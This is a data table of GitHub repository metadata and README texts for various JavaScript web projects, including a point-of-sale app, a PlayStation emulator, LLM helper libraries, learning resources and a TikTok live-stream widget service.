repo
stringlengths
8
123
branch
stringclasses
178 values
readme
stringlengths
1
441k
description
stringlengths
1
350
topics
stringlengths
10
237
createdAt
stringlengths
20
20
lastCommitDate
stringlengths
20
20
lastReleaseDate
stringlengths
20
20
contributors
int64
0
10k
pulls
int64
0
3.84k
commits
int64
1
58.7k
issues
int64
0
826
forks
int64
0
13.1k
stars
int64
2
49.2k
diskUsage
float64
license
stringclasses
24 values
language
stringclasses
80 values
Ayuen-madyt/Quicktill
main
# Quick Till Point of Sale ![POS](screenshots/quicktill_pos.png) Desktop Point of Sale app built with electron **Features:** - Can be used by multiple PC's on a network with one central database. - Receipt Printing. - Search for product by barcode. - Staff accounts and permissions. - Products and Categories. - Basic Stock Management. - Open Tabs (Orders). - Customer Database. - Transaction History. - Filter Transactions by Till, Cashier or Status. - Filter Transactions by Date Range. - Generate & print barcodes for each product ## Development Quicktill is an offline-first application built on jQuery, Node, and Electron. It utilizes a local NeDB as the database by default. ### Pre-requisites To get the dev environment up and running you need to first set up Node.js version 16.14.0 or greater and npm. For this, we suggest using [nvm](https://github.com/nvm-sh/nvm#installing-and-updating). Next, you will need to install [yarn](https://classic.yarnpkg.com/lang/en/docs/install/#mac-stable). ### Clone and Run Once you are through the Pre-requisites, you can run the following commands to setup Quicktill for development and building: ```bash # clone the repository git clone https://github.com/Ayuen-madyt/Quicktill.git # change directory cd Quicktill # install dependencies yarn ``` #### Development To run Quicktill in development mode: ```bash # start the electron app yarn electron ``` #### Build To build Quicktill and create an installer: ```bash # start the electron app yarn electron-build ``` **Note: Build Target** By default the above command will build for your computer's operating system and architecture. To build for other environments (example: for linux from a windows computer) check the _Building_ section at [electron.build/cli](https://www.electron.build/cli). ### Project Contribution Guidelines Thank you for your interest in contributing to Quicktill POS! This document outlines the guidelines for contributing to our repository. Please take a moment to read through this guide before making any contributions. By following these guidelines, you will help us maintain a high-quality codebase and ensure a smooth contribution process. ### Branching - Create a new branch for each significant contribution or bug fix. - Choose a descriptive name for your branch that reflects the purpose of your changes.- - To create a new branch: git checkout -b branch-name. ### Development Workflow - Fork the repository first. - Familiarize yourself with the project's technology stack, including jQuery, Node, and Electron. - Make your code changes, following the existing coding style and conventions. - Test your changes thoroughly, ensuring they work seamlessly with Quicktill's offline functionality. - Commit your changes with a clear and descriptive commit message. - Push your changes to your forked repository. - Open a pull request (PR) from your branch to the master branch of the main repository. ### Pull Request Guidelines - Each PR should have a clear and descriptive title. - Include a concise summary of the changes made in the description. - Provide any relevant information or context that may help reviewers understand the purpose and impact of the changes. ## License [GNU Affero General Public License v3.0](LICENSE)
A desktop Point of Sale (POS) system for small to large businesses. Manage inventory, track sales, and generate reports with ease. Easy-to-use interface and customizable features.
desktop,electron,inventory-management,invoicing,javascript,jquery,offline,opensource,point-of-sale,pos
2023-05-09T06:09:01Z
2023-10-31T10:35:52Z
null
3
0
30
1
5
8
null
null
JavaScript
google-home/smarthome-camerastream-webrtc
main
# Implement CameraStream using WebRTC codelab sample code This project contains the source for for the [Implement CameraStream using WebRTC codelab](https://developers.home.google.com/codelabs/smarthome-webrtc), which demonstrates how to stream from a local webcam to a Google Nest display device using a Firebase backend. ## Support - Stack Overflow: https://stackoverflow.com/questions/tagged/google-smart-home If you've found an error in this codelab, please file an issue: https://github.com/google-home/smarthome-camerastream-webrtc/issues ## License Copyright 2023 Google Inc. Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. https://github.com/google-home/smarthome-camerastream-webrtc/issues
This project contains the source for the Implement CameraStream using WebRTC codelab, which demonstrates how to stream from a local webcam to a Google Nest display device using a Firebase backend.
iot,smarthome,webrtc,firebase,google,javascript
2023-05-04T22:55:18Z
2023-07-01T09:51:47Z
null
2
1
4
0
1
8
null
Apache-2.0
JavaScript
PatelNeelMahesh/mern_perp
main
# MERN_Preparation ### [To Create Your Project](https://github.com/codinggita) ### Follow - https://github.com/codinggita ## HTML - Learn From: https://www.w3schools.com/html/ ### Interview Questions - https://www.interviewbit.com/html-interview-questions/ - https://www.geeksforgeeks.org/html-interview-questions-answers-set-1/ ### Test your html skills from - W3Schools HTML Quiz : https://www.w3schools.com/quiztest/quiztest.asp?qtest=HTML - LinkedIn Skill Assessment : https://www.linkedin.com/skill-assessments/HTML/quiz-intro/ - HTML Practice Questions: https://www.vskills.in/practice/html - HTML5: https://www.vskills.in/practice/html5 ## CSS - (W3Schools) https://www.w3schools.com/css/default.asp - (Github) https://github.com/PatelNeelMahesh/mern_perp/tree/main/css - (CSS Selectors) - https://flukeout.github.io/ [Solution: https://github.com/PatelNeelMahesh/mern_perp/blob/main/css/03_CSS_Dinner.txt] - (CSS FlexBox) - https://flexboxfroggy.com/ [Solution: https://github.com/PatelNeelMahesh/mern_perp/blob/main/css/11_Flexbox.txt] - (CSS Grid) - https://cssgridgarden.com/ [Solution: https://github.com/PatelNeelMahesh/mern_perp/blob/main/css/12_GridGarden.txt] ### Interview Questions - https://www.geeksforgeeks.org/css-interview-questions-and-answers/ - https://www.interviewbit.com/css-interview-questions/ ### Test your CSS skills from - HTML/CSS: https://app.testdome.com/screening/challenge/13?hard=false - CSS3: https://www.vskills.in/practice/css3 - W3Schools Quiz: https://www.w3schools.com/css/css_quiz.asp - LinedIn Skill Assesment: https://www.linkedin.com/skill-assessments/Cascading%20Style%20Sheets%20(CSS)/quiz-intro/ ## JavaScript ### Interview Questions - https://www.geeksforgeeks.org/javascript-interview-questions-and-answers/ - https://www.interviewbit.com/javascript-interview-questions/ - https://www.interviewbit.com/javascript-interview-questions/ ### JavaScript Coding Questions: https://www.keka.com/javascript-coding-interview-questions-and-answers ### Test your JavaScript skills from - JavaScript: https://app.testdome.com/screening/challenge/14?hard=false - JavaScript Developer: https://www.vskills.in/practice/javascript-developer - Web Developer: https://app.testdome.com/screening/challenge/16?hard=false - Front-End Web Development: https://www.vskills.in/practice/front-end-web-development-practice-questions ## React - https://www.turing.com/interview-questions/react-js - https://github.com/sudheerj/reactjs-interview-questions - https://www.interviewbit.com/react-interview-questions/ ### React Coding Questions: https://codeinterview.io/blog/reactjs-coding-interview-questions/ ### Test your React skills from - React: https://app.testdome.com/screening/challenge/104?hard=false - React Redux: https://app.testdome.com/screening/challenge/254?hard=false - React Practice: https://www.vskills.in/practice/reactjs-practice-questions ## MongoDB - MongoDB Complete Course: https://www.youtube.com/watch?v=rU9ZODw5yvU&t=4366s ## NodeJS - https://github.com/PatelNeelMahesh/mern_perp/tree/main/node/01.node_edyoda_api ## Express - Documentation: https://expressjs.com/en/5x/api.html ## MERN ### Test your MERN skills from - JavaScript and Node.js: https://app.testdome.com/screening/challenge/111?hard=false - MERN : https://www.vskills.in/practice/mern-stack-questions - Nodejs : https://www.vskills.in/practice/nodejs ## Mock Interviews - JavaScript Mock Interview: https://www.youtube.com/watch?v=8eRVxE9PEF0&list=PL9qDYKb1dFMBScm5OBuQ-nweAjEtGqv42&index=10 - JavaScript Mock Interview: https://www.youtube.com/watch?v=83ZSwO3BdHk&list=PL9qDYKb1dFMBScm5OBuQ-nweAjEtGqv42&index=11 - React.JS Mock Interview: https://www.youtube.com/watch?v=6qERg1Yt1QQ&list=PL9qDYKb1dFMBScm5OBuQ-nweAjEtGqv42&index=4 - React.JS Mock Interview: https://www.youtube.com/watch?v=7JG-VwMiTgE&list=PL9qDYKb1dFMBScm5OBuQ-nweAjEtGqv42&index=28 - MERN Stack Interview Questions: https://www.youtube.com/watch?v=HlLsWeyn0wE&list=PL9qDYKb1dFMBScm5OBuQ-nweAjEtGqv42&index=40 # For more practice on front end topics you can visit ## This course is designed to help students master Front-end technologies - with focus on(HTML,CSS,Javascript,React JS) - https://kalvium.community/livebooks/fewd_sc001
null
css,express,hacktoberfest,html,interview-questions,javascript,mongodb,nodejs,react,sql
2023-05-10T07:10:18Z
2023-09-30T15:02:59Z
null
4
7
207
0
27
8
null
null
JavaScript
lrusso/PlayStation
main
# PlayStation PlayStation Emulator in JavaScript and WebAssembly. ![alt screenshot](https://raw.githubusercontent.com/lrusso/PlayStation/main/PlayStation.png) ## Web: https://lrusso.github.io/PlayStation/PlayStation.htm ## Main differences with WasmPSX: * Sound working. * Mute/unmute implementation. * The rendering fills the entire window. * File format validation. * Improved main screen. * Icons added for all the available options. * Internationalization (English and Spanish). ## Based on the work of: https://github.com/js-emulators/wasmpsx
PlayStation Emulator in JavaScript and WebAssembly
emulator,javascript,online,playstation,web,webassembly
2023-05-07T02:17:30Z
2023-12-17T20:04:03Z
null
1
1
34
0
9
8
null
null
HTML
muazimmaqbool/Javascript-from-scratch
master
# Javascript-from-scratch Learn Javascript with code explained on every line, withmuazim maqbool "JavaScript from Scratch" is a repository that provides beginners with a comprehensive introduction to the fundamentals of JavaScript programming language. The repository includes step-by-step tutorials, code examples, and exercises that cover the basics of syntax, data types, control flow, functions, objects, and more. The goal is to help users build a strong foundation in JavaScript and gain confidence in their ability to write basic scripts and applications. The repository is designed to be accessible to anyone with little or no prior programming experience, making it a great resource for those who are just starting to learn JavaScript.
Learn Javascript with code explained on every line
advancejavascript,fetchapi,javascript,learnjavascript,code,tutorial
2023-05-01T10:10:34Z
2024-04-27T10:04:56Z
null
1
2
41
0
3
8
null
null
HTML
muazimmaqbool/Reactjs-with-Me
master
# Getting Started with Create React App This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app). ## Available Scripts In the project directory, you can run: ### `npm start` Runs the app in the development mode.\ Open [http://localhost:3000](http://localhost:3000) to view it in your browser. The page will reload when you make changes.\ You may also see any lint errors in the console. ### `npm test` Launches the test runner in the interactive watch mode.\ See the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information. ### `npm run build` Builds the app for production to the `build` folder.\ It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes.\ Your app is ready to be deployed! See the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for more information. ### `npm run eject` **Note: this is a one-way operation. Once you `eject`, you can't go back!** If you aren't satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. Instead, it will copy all the configuration files and the transitive dependencies (webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you're on your own. You don't have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn't feel obligated to use this feature. However we understand that this tool wouldn't be useful if you couldn't customize it when you are ready for it. ## Learn More You can learn more in the [Create React App documentation](https://facebook.github.io/create-react-app/docs/getting-started). To learn React, check out the [React documentation](https://reactjs.org/). ### Code Splitting This section has moved here: [https://facebook.github.io/create-react-app/docs/code-splitting](https://facebook.github.io/create-react-app/docs/code-splitting) ### Analyzing the Bundle Size This section has moved here: [https://facebook.github.io/create-react-app/docs/analyzing-the-bundle-size](https://facebook.github.io/create-react-app/docs/analyzing-the-bundle-size) ### Making a Progressive Web App This section has moved here: [https://facebook.github.io/create-react-app/docs/making-a-progressive-web-app](https://facebook.github.io/create-react-app/docs/making-a-progressive-web-app) ### Advanced Configuration This section has moved here: [https://facebook.github.io/create-react-app/docs/advanced-configuration](https://facebook.github.io/create-react-app/docs/advanced-configuration) ### Deployment This section has moved here: [https://facebook.github.io/create-react-app/docs/deployment](https://facebook.github.io/create-react-app/docs/deployment) ### `npm run build` fails to minify This section has moved here: [https://facebook.github.io/create-react-app/docs/troubleshooting#npm-run-build-fails-to-minify](https://facebook.github.io/create-react-app/docs/troubleshooting#npm-run-build-fails-to-minify)
Reactjs tutorials with code and explanation
front-end,front-end-development,frontend,javascript,javascript-library,reacjs,react,react-hooks,react-router,tutorials
2023-04-26T13:26:57Z
2024-05-18T15:24:26Z
null
1
0
49
0
3
8
null
null
JavaScript
iskandarreza/loopgpt-js
main
## LoopGPT-JS https://github.com/iskandarreza/loopgpt-js A lightweight Javascript implementation of the [`loopgpt`](https://github.com/farizrahman4u/loopgpt) Python module by Fariz Rahman. For use in browser environments, particularly off the main thread within web worker processes. ### How it works Here's a basic rundown of how autonomous self-prompting AI agents like LoopGPT or AutoGPT work: ![How AutoGPT works](./docs/images/how-self-prompting-works.jpg) - User sets the initial config, which describes the agent and it's goals - System generates an initial prompt to send to the chat completion API - Chat completion API provides a response in a preset format that the system can process. Response may include the next command the agent decides to take - System processes the response, runs any commands the agent includes in the last response, then generates the next prompt to send to the chat completion API - Cycle repeats until exit conditions are met ### View the docs [JSDoc](https://iskandarreza.github.io/loopgpt-js/) #### Add to your node project: ```bash npm install loopgpt-js ``` #### Usage example: ```js const loopgpt = require('loopgpt-js') const { Agent } = loopgpt async function initLoop() { // you could save the api key(s) on a server and fetch it when needed const apiKeyResponse = await fetch('/api/openai', { method: 'POST' }) const { apiKey } = await apiKeyResponse.json() // or you could pass it in directly const keys = { openai: apiKey, google: { googleApiKey: 'GOOGLE_API_KEY', googleCxId: 'CUSTOM_SEARCH_ENGINE_ID' } } // Create a new instance of the Agent class const agent = new Agent({ keys: keys, goals: [ 'Run the web_search command for "California wildflowers" and then produce an overview of your findings with descriptions of each flower and their native area,' ] }) const chat = async () => { let response response = await agent.chat({ message: null }) while (response?.command?.name !== 'task_complete') { response = await agent.chat({ run_tool: true }) console.log(agent) console.log(response) } } chat() } initLoop() ``` #### See Also: https://github.com/iskandarreza/ai-worker-js -- Implementation of loopgpt-js as a dynamically created web worker in a Next/React app
A Javascript implementation of LoopGPT
autogpt,chatgpt,gpt,llms,javascript,webworker
2023-05-16T07:18:08Z
2023-05-23T17:49:00Z
null
2
2
14
0
0
8
null
MIT
JavaScript
IsaquePemasi/PetAmigo
master
<h1 align=center> <img src="./img/icon.png" width=30> PetAmigo</h1> <h2>:memo: Descrição</h1> <p>Uma plataforma online para mediar o processo de adoção e doação de animais de estimação.</p> <p>Nosso objetivo é facilitar esse processo, promovendo a coscientização sobre a importância de cuidar dos animais e promover a adoção responsável.</p> <h2>:books: Funcionalidades</h1> <p>Adoção: Os usuários podem explorar os perfis de animais disponíveis para adoção.</p> Doação: Os usuários podem cadastrar e criar um perfil de seus animais para adoção. <h2>:wrench: Tecnologias utilizadas</h1> <p>JQuery</p> <p>Bootstrap</p> <p>HTML</p> <p>CSS</p> <p>JavaScript</p> <h2>:rocket: O projeto</h1> https://pet-amigo-pink.vercel.app/ <h2>:handshake: Autores</h2> <a href="https://github.com/IsaquePemasi/"><img src="https://avatars.githubusercontent.com/u/76749511?v=4" width=115></a> <a href="https://github.com/ThyagoGF/"><img src="https://avatars.githubusercontent.com/u/101207161?v=4" width=115></a> <a href="https://github.com/GustavoSirkis/"><img src="https://avatars.githubusercontent.com/u/67662233?v=4" width=115></a> <a href="https://github.com/Muriloangeleli/"><img src="https://avatars.githubusercontent.com/u/101616411?v=4" width=115></a> <a href="https://github.com/alvesdg/"><img src="https://avatars.githubusercontent.com/u/117877167?v=4" width=115></a> <a href="https://github.com/jnsdavid95/"><img src="https://avatars.githubusercontent.com/u/111385874?v=4" width=115></a> <a href="https://github.com/epilefotsugua1995/"><img src="https://avatars.githubusercontent.com/u/107443579?v=4" width=115></a>
Uma plataforma online para mediar o processo de adoção e doação de animais de estimação. Nosso objetivo é facilitar esse processo, promovendo a coscientização sobre a importância de cuidar dos animais e promover a adoção responsável.
html,bootstrap,css,javascript,jquery
2023-05-13T20:30:00Z
2023-11-19T17:16:28Z
null
7
16
39
0
4
8
null
null
HTML
ViktorSvertoka/web-studio
main
# Web Studio ![Demonstration](./assets/web-studio.png)
My pet project👨‍💻
css3,html5,javascript,lending,sass,scss
2023-04-29T19:20:58Z
2023-10-28T20:03:25Z
null
1
17
68
0
0
8
null
null
HTML
log10-io/log10js
main
# log10 ⚡ Unified LLM data management ⚡ <!-- [![pypi](https://github.com/log10-io/log10/actions/workflows/release.yml/badge.svg)](https://github.com/log10-io/log10/actions/workflows/release.yml) --> [![](https://dcbadge.vercel.app/api/server/CZQvnuRV94?compact=true&style=flat)](https://discord.gg/CZQvnuRV94) ## Quick Install ``` bash npm install log10js yarn add log10js ``` ## 🤔 What is this? A JavaScript integration to manage your LLM data. ```javascript const { Configuration, OpenAIApi } = require("openai"); const log10 = require("log10js"); const configuration = new Configuration({ apiKey: process.env.OPENAI_API_KEY, }); const log10_OpenAIApi = log10(OpenAIApi); const openai = new log10_OpenAIApi(configuration); ``` Access your LLM data at [log10.io](https://log10.io) [See full example](./examples/completions.js) ## 🚀 What can this help with? **🔍🐞 Prompt chain debugging** Prompt chains such as those in [Langchain](https://github.com/hwchase17/langchain) can be difficult to debug. Log10 provides prompt provenance, session tracking and call stack functionality to help debug chains. ```javascript const { OpenAI } = require("langchain/llms/openai"); const { Configuration, OpenAIApi } = require("openai"); const log10 = require("log10js"); const log10_OpenAIApi = log10(OpenAIApi); const openai = new log10_OpenAIApi( new Configuration({ apiKey: process.env.OPENAI_API_KEY, }) ); let model = new OpenAI(); model.client = openai; // Run any chain here... ``` [See full example](./examples/langchain_summarize.js) **📝📊 Logging** Log all your OpenAI calls to compare and find the best prompts, store feedback, collect latency and usage metrics, and perform analytics and compliance monitoring of LLM powered features. **🧠🔁 Readiness for RLHF & self hosting** Use your data and feedback from users to fine-tune custom models with RLHF with the option of building and deploying more reliable, accurate and efficient self-hosted models. **👥🤝 Collaboration** Create flexible groups to share and collaborate over all of the above features ## ⚙️ Setup Create a free account at [log10.io](https://log10.io) to get a `LOG10_TOKEN` and a `LOG10_ORG_ID`. Please add these to your environment along with `LOG10_URL=https://log10.io`. ## 💬 Community We welcome community participation and feedback. Please leave an issue, submit a PR or join our [Discord](https://discord.gg/CZQvnuRV94).
JavaScript client library for managing your LLM data in one place
ai,artificial-intelligence,autonomous-agents,debugging,javascript,langchain,langchain-js,llmops,logging,monitoring
2023-04-25T05:11:22Z
2023-05-03T00:54:19Z
null
2
5
16
3
0
8
null
MIT
JavaScript
Talyson-Ferreira1/Dev-Quiz
main
<img width=100% src="https://capsule-render.vercel.app/api?type=waving&color=00bfbf&height=180&section=header=00bfbf&text=DevQuiz"/> [![Typing SVG](https://readme-typing-svg.herokuapp.com/?color=00bfbf&size=35&center=true&vCenter=true&width=1000&lines=Olá,+me+chamo+Talyson;Estou+em+busca+de+aprimorar+meus+conhecimentos;em+reactJS+e+conseguir+um+estágio;Eu+estudo+análise+e+desenvolvimento+de+sistemas;Esse+projeto+é+um+Quiz+sobre+programação;seja+bem-vindo!+:%29)](https://git.io/typing-svg) <p align="center" margin-left="1em"> O objetivo principal do projeto é aprimorar minhas habilidades com ReactJS. Nesse projeto utilizo algumas tecnologias que me auxiliaram no desenvolvimento desse projeto: FontAwesome, uma ferramenta que disponibiliza vários ícones de forma gratuita, o ChatGPT que criou todas as perguntas, entre outras ferramentas integradas ao React. A aplicação é simples e intuitiva: <ol> <li> Clique em começar.</li> <li> Escolha o tema e a dificuldade das perguntas.</li> <li> Responda as perguntas. </li> <li> Visualize o resultado e as respostas corretas. </li> </ol> A aplicação continua em desenvolvimento, em breve, adicionarei um timer, integrarei ao banco de dados e criarei um componente de login para o usuário, um ranking de pontos e a adição de novas perguntas. </p> <br> <br><img align="center" alt="Js" height="auto" width="100%" src="./src/img/readmeIcons/init.png"><br> <br><img align="center" alt="Js" height="auto" width="100%" src="./src/img/readmeIcons/chooselanguage.png"><br> <br><img align="center" alt="Js" height="auto" width="100%" src="./src/img/readmeIcons/QuestionArea.png"><br> <br><img align="center" alt="Js" height="auto" width="100%" src="./src/img/readmeIcons/GameOver.png"><br> <br>Ferramentas utilizadas: <div margin="10px"align="start" valign="top"><br> <img align="center" alt="git" height="30" src="./src/img/icons/icon-react.svg"> <img align="center" alt="CSS" height="30" width="40" src="https://raw.githubusercontent.com/devicons/devicon/master/icons/css3/css3-original.svg"> <img align="center" alt="git" height="30" width="40" src="https://raw.githubusercontent.com/devicons/devicon/master/icons/git/git-original.svg"> <img align="center" alt="git" height="30" src="./src/img/readmeIcons/font-awesome.png"> <img align="center" alt="git" height="30" src="./src/img/readmeIcons/chat-gpt.jpg"> </div><br> Meu linkedin: <br><a aling="center" href="https://www.linkedin.com/in/talyson-ferreira-5a5682136/" target="_blank"><img src="https://img.shields.io/badge/-LinkedIn-%230077B5?style=for-the-badge&logo=linkedin&logoColor=white" target="_blank"></a> <img width=100% src="https://capsule-render.vercel.app/api?type=waving&color=00bfbf&height=120&section=footer"/>
Quiz app for programers
css,html,java,javascript,perguntas-e-respostas,python,quiz,quiz-app,quizapp,quizz-game
2023-05-15T02:13:04Z
2023-06-15T00:30:04Z
null
1
0
30
1
0
8
null
null
JavaScript
AmrBedir/YouTube-Clone
main
<h1>⭐ About the Project</h1> ![YouTube-Clone](./youtube-clone.jpg) YouTube-Clone is a clone of the home page of YouTube. <br> You can see the project by clicking this link: https://amrbedir.github.io/YouTube-Clone/ <h2> Features </h2> - Pleasant UI - Mobile Responsive <h2>🌐 Tech Stack</h2> <div align="left"> ![HTML](https://img.shields.io/badge/HTML5-E34F26?style=for-the-badge&logo=html5&logoColor=white) ![CSS](https://img.shields.io/badge/CSS3-1572B6?style=for-the-badge&logo=css3&logoColor=white) ![Bootstrap](https://img.shields.io/badge/Bootstrap-563D7C?style=for-the-badge&logo=bootstrap&logoColor=white) </div>
A YouTube Clone using HTML & CSS & JavaScript.
clone,css,html,youtube,javascript
2023-04-30T18:43:39Z
2023-05-04T12:49:41Z
null
1
0
5
0
0
8
null
null
HTML
maciejkubus/ultimate-cloud-storage
master
<p align="center"> <a href="http://nestjs.com/" target="blank"><img src="https://nestjs.com/img/logo-small.svg" width="200" alt="Nest Logo" /></a> </p> [circleci-image]: https://img.shields.io/circleci/build/github/nestjs/nest/master?token=abc123def456 [circleci-url]: https://circleci.com/gh/nestjs/nest <p align="center">A progressive <a href="http://nodejs.org" target="_blank">Node.js</a> framework for building efficient and scalable server-side applications.</p> <p align="center"> <a href="https://www.npmjs.com/~nestjscore" target="_blank"><img src="https://img.shields.io/npm/v/@nestjs/core.svg" alt="NPM Version" /></a> <a href="https://www.npmjs.com/~nestjscore" target="_blank"><img src="https://img.shields.io/npm/l/@nestjs/core.svg" alt="Package License" /></a> <a href="https://www.npmjs.com/~nestjscore" target="_blank"><img src="https://img.shields.io/npm/dm/@nestjs/common.svg" alt="NPM Downloads" /></a> <a href="https://circleci.com/gh/nestjs/nest" target="_blank"><img src="https://img.shields.io/circleci/build/github/nestjs/nest/master" alt="CircleCI" /></a> <a href="https://coveralls.io/github/nestjs/nest?branch=master" target="_blank"><img src="https://coveralls.io/repos/github/nestjs/nest/badge.svg?branch=master#9" alt="Coverage" /></a> <a href="https://discord.gg/G7Qnnhy" target="_blank"><img src="https://img.shields.io/badge/discord-online-brightgreen.svg" alt="Discord"/></a> <a href="https://opencollective.com/nest#backer" target="_blank"><img src="https://opencollective.com/nest/backers/badge.svg" alt="Backers on Open Collective" /></a> <a href="https://opencollective.com/nest#sponsor" target="_blank"><img src="https://opencollective.com/nest/sponsors/badge.svg" alt="Sponsors on Open Collective" /></a> <a href="https://paypal.me/kamilmysliwiec" target="_blank"><img src="https://img.shields.io/badge/Donate-PayPal-ff3f59.svg"/></a> <a href="https://opencollective.com/nest#sponsor" target="_blank"><img src="https://img.shields.io/badge/Support%20us-Open%20Collective-41B883.svg" alt="Support us"></a> <a href="https://twitter.com/nestframework" target="_blank"><img src="https://img.shields.io/twitter/follow/nestframework.svg?style=social&label=Follow"></a> </p> <!--[![Backers on Open Collective](https://opencollective.com/nest/backers/badge.svg)](https://opencollective.com/nest#backer) [![Sponsors on Open Collective](https://opencollective.com/nest/sponsors/badge.svg)](https://opencollective.com/nest#sponsor)--> ## Description [Nest](https://github.com/nestjs/nest) framework TypeScript starter repository. ## Installation ```bash $ npm install ``` ## Running the app ```bash # development $ npm run start # watch mode $ npm run start:dev # production mode $ npm run start:prod ``` ## Test ```bash # unit tests $ npm run test # e2e tests $ npm run test:e2e # test coverage $ npm run test:cov ``` ## Support Nest is an MIT-licensed open source project. It can grow thanks to the sponsors and support by the amazing backers. If you'd like to join them, please [read more here](https://docs.nestjs.com/support). ## Stay in touch - Author - [Kamil Myśliwiec](https://kamilmysliwiec.com) - Website - [https://nestjs.com](https://nestjs.com/) - Twitter - [@nestframework](https://twitter.com/nestframework) ## License Nest is [MIT licensed](LICENSE).
Ultimate Cloud Storage is a personal cloud service built using NestJS, TypeScript, TypeORM, and MySQL. It provides a secure and scalable solution for storing and managing your files, with a primary focus on photos while supporting uploads of various file types. With its intuitive interface and robust functionality, Ultimate Cloud Storage allows you
cloud,javascript,nest,nestjs,nodejs,typescript
2023-05-14T14:13:06Z
2024-03-01T14:01:28Z
null
1
0
54
4
0
8
null
MIT
TypeScript
ManishBisht777/courseify
main
# Courseify An open source application built using the Nextjs 13 > **Warning** > This app is a work in progress. I'm building this in public. You can follow the progress on Twitter [@manishbisht9711](https://twitter.com/manishbisht9711). > See the roadmap below. ## About this project This project is an open source project for courses but anyone can contribute to the courses. ## Technologies used - Next Js - TypeScript ## Note on Performance > **Warning** > This app is using the unstable releases for Next.js 13 and React 18. The new router and app dir is still in beta and not production-ready. > **Expect some performance hits when testing the dashboard**. > If you see something broken, you can raise a issue ## Running Locally 1. Install dependencies using yarn: ```sh yarn ``` 2. Start the development server: ```sh yarn dev ``` 3. Before making a pull request run: ```sh yarn preview ```
A Open Source website to share knowledge
good-first-issue,javascript,nextjs,open-source,react
2023-04-24T17:24:02Z
2023-05-20T16:02:20Z
null
5
13
51
6
3
8
null
MIT
TypeScript
IonMateus/jumping-stars
main
# Jumping Stars ## Links https://ionmateus.github.io/jumping-stars/ ## Descrição <p>Gerador de estrelas</p> ## Como usar <p>Altere os valores pelos inputs para mudar o comportamento das estrelas.</p> ## Dados * Criado em maio de 2023 * Feito com HTML, CSS e JS ## Imagens <img src="https://raw.githubusercontent.com/IonMateus/jumping-stars/main/ReadmeImages/initial.png"/> Padrão <br> <br> <br> <img src="https://raw.githubusercontent.com/IonMateus/jumping-stars/main/ReadmeImages/configured.png"/> Sem botões <br> <br> <br>
Gerador de estrelas - 05/2023
css,html,javascript,js,stars
2023-05-13T18:22:16Z
2024-02-02T10:31:26Z
null
1
0
11
0
0
8
null
null
JavaScript
zcharef/streamshape
main
StreamShape: A TikTok Live Streaming SaaS Showcase ================================================== ![image info](./logo.png) Welcome to the source code of [StreamShape](https://streamshape.net/), one of my initial endeavors in building a SaaS platform. Although this project has been discontinued and might be outdated, I am sharing it for anyone interested in learning from or continuing the project. Overview -------- StreamShape was created in about two months while I was studying and working on it during nights and weekends. The project leverages the [TikTok Live Connector](https://github.com/zerodytrash/TikTok-Live-Connector) and aims to provide a scalable solution for streamers. However, due to constant changes in TikTok's security, the service faced disruptions, leading to its discontinuation. Despite some missing features and areas for improvement, such as unit tests and abstract layers, StreamShape managed to attract a dozen customers with monthly subscriptions within three months. End User Product -------- Here is an example of the product being used in a real-life scenario by the TikTok Streamer [Elric](https://www.tiktok.com/@elric.off) : * [Real Time Chat Widget](https://www.youtube.com/watch?v=70_usy6__E0) \ \ [![YT1](https://img.youtube.com/vi/70_usy6__E0/maxresdefault.jpg)](https://www.youtube.com/watch?v=70_usy6__E0) * [Alert Widgets](https://www.youtube.com/watch?v=F-k9EPhZYfA) \ \ [![YT1](https://img.youtube.com/vi/F-k9EPhZYfA/maxresdefault.jpg)](https://www.youtube.com/watch?v=F-k9EPhZYfA) Architecture ------------ The ideal architecture for this project consisted of: * Microk8s instances or AWS Lambdas executing each user's TikTok brokers (listening to the user's TikTok stream events) * A managed PostgreSQL database with automatic scaling, replication, and backups (AWS RDS) * A managed headless Node.js server generating dynamic widgets and listening to broker events (AWS Elastic Beanstalk) * A managed RabbitMQ server (AWS MQ) However, due to my limited experience with AWS at the time, I used DigitalOcean instances for all components and manually deployed brokers for new subscribers. The project could be migrated to a more sophisticated architecture as described above if needed. ![image info](./architecture.png) StreamShape also utilized external SaaS solutions, such as Better Uptime for monitoring APIs and brokers and Stripe for handling subscriptions. Modules Breakdown ----------------- 1. **TikTok Broker**: One "Broker" per TikTok user runs in a small container. The broker listens to the user's events from TikTok's internal WebCast push service and emits them to the RabbitMQ server on the user's respective channel. 2. **Server**: The "Server" folder contains an Express.js server handling sockets, static content, and dynamic routes. This server consumes all MQTT events sent by brokers and handles them by transmitting them to the user's dedicated widget page. 3. **Dynamic Widget Page**: Each user has a unique route generated by their database ID. The server searches for the associated TikTok username with this StreamShape user ID, e.g., `https://widgets.streamshape.com/5600e838-26e8-4a61-a0a1-3d1d917efb35/gifts`. The server dynamically generates an HTML/CSS/JS page (using Pug templating) with a socket that listens to the emitted events. When a TikTok user receives an event, a JS function on this dynamic page executes the desired behavior (animations, text on screen, etc.). 4. **User Configuration**: The dynamic page is generated from the StreamShape user's config database table. When navigating to the user's widget page, the server queries the REST API, retrieves the user ID in the URL, and fetches the user's configuration, such as custom colors and alerts. Future Plans ------------ I had initially planned to create a user dashboard and automate broker creation when a new user subscribes to the service. The dashboard would have allowed streamers to manage their subscriptions, customize their widgets with a user-friendly interface, and more. Conclusion ---------- Thanks to StreamShape, I have developed valuable skills in building a functional SaaS product from scratch, while focusing on the eXtremeLean philosophy of rapidly delivering a Minimum Viable Product (MVP). This project has not only honed my technical expertise but also provided me with insights into the challenges of creating a successful SaaS platform. I invite you to explore the project, learn from it, or continue developing it further. Acknowledgments ---------- Special thanks to : * [François-Guillaume RIBREAU](https://github.com/FGRibreau) for sharing his knowledge and experience 